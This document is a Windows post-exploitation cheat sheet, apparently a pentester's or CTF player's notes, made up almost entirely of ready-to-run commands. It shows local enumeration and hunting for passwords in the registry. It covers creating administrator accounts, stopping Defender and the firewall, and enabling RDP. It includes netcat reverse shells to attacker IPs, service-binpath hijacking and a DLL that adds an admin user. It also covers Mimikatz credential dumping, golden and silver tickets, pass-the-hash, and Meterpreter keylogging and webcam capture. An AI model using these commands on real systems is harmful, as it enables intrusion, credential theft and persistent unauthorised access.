Windows

Local enum

1
# Tools
2
https://github.com/S3cur3Th1sSh1t/WinPwn
3
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat
4
https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/PowerUp.ps1
5
https://github.com/S3cur3Th1sSh1t/PowerSharpPack
6
https://github.com/Flangvik/SharpCollection
7
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
8
https://github.com/dafthack/DomainPasswordSpray
9
https://github.com/CredDefense/CredDefense
10
https://github.com/dafthack/MailSniper
11
https://github.com/itm4n/PrivescCheck
12
13
https://lolbas-project.github.io/#
14
15
# Basic info
16
systeminfo
17
set
18
Get-ChildItem Env: | ft Key,Value
19
hostname
20
net users
21
net user user1
22
query user
23
Get-LocalUser | ft Name,Enabled,LastLogon
24
Get-ChildItem C:\Users -Force | select Name
25
net use
26
wmic logicaldisk get caption,description,providername
27
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
28
net localgroups
29
accesschk.exe -uwcqv "Authenticated Users" *
30
netsh firewall show state
31
netsh firewall show config
32
whoami /priv
33
echo %USERNAME%
34
$env:UserName
35
wmic qfe
36
qwinsta
37
query user
38
net localgroup
39
Get-LocalGroup | ft Name
40
41
# Set path
42
set PATH=%PATH%;C:\xampp\php
43
44
dir /a -> Show hidden & unhidden files
45
dir /Q -> Show permissions
46
47
# check .net version:
48
gci 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | gp -name Version -EA 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version
49
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Users Path"
50
51
# Passwords
52
# Windows autologin
53
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
54
# VNC
55
reg query "HKCU\Software\ORL\WinVNC3\Password"
56
# SNMP Parameters
57
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
58
# Putty
59
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
60
# Search for password in registry
61
reg query HKLM /f password /t REG_SZ /s
62
reg query HKCU /f password /t REG_SZ /s
63
python secretsdump.py -just-dc-ntlm htb.hostname/[email protected]
64
secretsdump.py -just-dc htb.hostname/[email protected] > dump.txt
65
66
# Add RDP user and disable firewall
67
net user test Test123! /add
68
net localgroup Administrators test /add
69
net localgroup "Remote Desktop Users" test /ADD
70
# Turn firewall off and enable RDP
71
sc stop WinDefend
72
netsh advfirewall show allprofiles
73
netsh advfirewall set allprofiles state off
74
netsh firewall set opmode disable
75
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
76
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
77
78
# Dump Firefox data
79
# Looking for Firefox
80
Get-Process
81
./procdump64.exe -ma $PID-FF
82
Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
83
type 1.txt | findstr /s /i "admin"
84
85
# PS Bypass Policy
86
Set-ExecutionPolicy Unrestricted
87
powershell.exe -exec bypass
88
Set-ExecutionPolicy-ExecutionPolicyBypass -Scope Procesy
89
90
# Convert passwords to secure strings and output to an XML file:
91
$secpasswd = ConvertTo-SecureString "VMware1!" -AsPlainText -Force
92
$mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd)
93
$mycreds | export-clixml -path c:\temp\password.xml
94
95
# PS sudo
96
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
97
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
98
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
99
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
100
powershell -ExecutionPolicy -F -File xyz.ps1
101
102
# PS runas
103
# START PROCESS
104
$username='someUser'
105
$password='somePassword'
106
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
107
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
108
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential
109
# INVOKE COMMAND
110
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential ("fidelity\hector", $pass);Invoke-Command -Computer 'Fidelity' -ScriptBlock {C:\inetpub\wwwroot\uploads\nc.exe -e cmd 10.10.15.121 443} -credential $Credential
111
112
# Tasks
113
schtasks /query /fo LIST /v
114
file c:\WINDOWS\SchedLgU.Txt
115
python3 atexec.py Domain/Administrator:<Password>@[email protected] systeminfo
116
117
# Useradd bin
118
#include /* system, NULL, EXIT_FAILURE */
119
int main ()
120
{
121
int i;
122
i=system ("net user /add && net localgroup administrators /add");
123
return 0;
124
}
125
# Compile
126
i686-w64-mingw32-gcc -o useradd.exe useradd.c
127
128
# WinXP
129
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe"
130
sc config upnphost obj= ".\LocalSystem" password= ""
131
sc qc upnphost
132
sc config upnphost depend= ""
133
net start upnphost
134
135
# WinRM Port Forwarding
136
plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221
137
138
# DLL Injection
139
#include
140
int owned()
141
{
142
WinExec("cmd.exe /c net user username Password01 ; net localgroup administrators username /add", 0);
143
exit(0);
144
return 0;
145
}
146
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
147
{
148
owned();
149
return 0;
150
}
151
# x64 compilation:
152
x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
153
x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
154
155
# Generate Silver Tickets with Impacket:
156
python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
157
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
158
159
# Generate Golden Tickets:
160
python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
161
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
162
163
# Credential Access with Secretsdump
164
impacket-secretsdump [email protected] -dc-ip target-ip
165
166
# AMSI bypass code generator (Antimalware Scan Interface)
167
https://amsi.fail/

Mimikatz

1
# SAM
2
privilege::debug
3
token::elevate
4
lsadump::sam
5
6
# Windows Credential Manager
7
privilege::debug
8
sekurlsa::credman
9
10
# LSASS
11
privilege::debug
12
sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP
13
sekurlsa::logonpasswords
14
# or
15
privilege::debug
16
lsadump::lsa /patch
17
18
# WDigest
19
privilege::debug
20
sekurlsa::wdigest

Privilege Escalation

1
# Check groups and privs
2
whoami /priv
3
4
# Interesting accounts
5
6
- Administrators, Local System
7
- Built-in groups (Backup, Server, Printer Operators)
8
- Local/network service accounts
9
- Managed Service and Virtual Accounts
10
- Third party application users
11
- Misconfigured users
12
13
# Interesting privileges
14
15
- SeDebugPrivilege
16
Create a new process and set its parent to a privileged process
17
https://github.com/decoder-it/psgetsystem
18
- SeRestorePrivilege
19
Can write files anywhere, including overwriting protected system files
20
Modify a service that runs as Local System and is startable by all users, then start it to get a SYSTEM shell
21
- SeBackupPrivilege
22
Can back up the Windows registry and use third-party tools to extract local NTLM hashes
23
Members of “Backup Operators” can log on locally to a Domain Controller and back up the NTDS.DIT
24
- SeTakeOwnershipPrivilege
25
Can take ownership of any securable object in the system
26
- SeTcbPrivilege
27
Can log on as a different user without any credentials in order to obtain an impersonation token via the LsaLogonUser() function
28
- SeCreateTokenPrivilege
29
Can create a custom token with all the privileges and group memberships you need (before Win 10 1809)
30
However, if you set the AuthenticationId to ANONYMOUS_LOGON_UID (0x3e6) you can still impersonate even on Win >= 1809, using only a subset of API calls: CreateFile(), RegSetKey()
31
- SeLoadDriverPrivilege
32
"Print Operators" have this privilege on a DC
33
Determines which users can dynamically load and unload device drivers or other code into kernel mode
34
- SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege
35
Permit impersonating any access token
36
37
** If you have SeBackup & SeRestore privileges (Backup Operators group) you can set permission and ownership on each file & folder **

Loot

1
hostname && whoami.exe && ipconfig /all
2
wce32.exe -w
3
wce64.exe -w
4
fgdump.exe
5
6
# Loot passwords without tools
7
reg.exe save hklm\sam c:\sam_backup
8
reg.exe save hklm\security c:\security_backup
9
reg.exe save hklm\system c:\system
10
11
ipconfig /all
12
route print
13
14
# Which other machines this host has been communicating with (ARP cache)
15
arp -a
16
17
# Meterpreter
18
run packetrecorder -li
19
run packetrecorder -i 1
20
21
#Meterpreter
22
search -f *.txt
23
search -f *.zip
24
search -f *.doc
25
search -f *.xls
26
search -f config*
27
search -f *.rar
28
search -f *.docx
29
search -f *.sql
30
hashdump
31
keysscan_start
32
keyscan_dump
33
keyscan_stop
34
webcam_snap
35
load mimikatz
36
msv
37
38
# How to cat files in meterpreter
39
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
40
41
# Recursive search
42
dir /s
43
44
secretsdump.py -just-dc htb.hostname/[email protected] > dump.txt
45
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
46
47
# Mimikatz
48
# Post exploitation commands must be executed from SYSTEM level privileges.
49
mimikatz # privilege::debug
50
mimikatz # token::whoami
51
mimikatz # token::elevate
52
mimikatz # lsadump::sam
53
mimikatz # sekurlsa::logonpasswords
54
## Pass The Hash
55
mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
56
# Inject the generated ticket (.kirbi)
57
mimikatz # kerberos::ptt <ticket_kirbi_file>
58
# Generating a silver ticket
59
# AES 256 Key:
60
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
61
# AES 128 Key:
62
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
63
# NTLM
64
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
65
# Generating a Golden Ticket
66
# AES 256 Key:
67
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
68
# AES 128 Key:
69
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
70
# NTLM:
71
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
72
73
# Lsassy (remote lsass/mimikatz dump reader) (requires impacket)
74
git clone https://github.com/hackndo/lsassy
75
cd lsassy && sudo python3 setup.py install
76
lsassy example.com/Administrator:[email protected]
77
78
# Lsass dump
79
https://github.com/outflanknl/Dumpert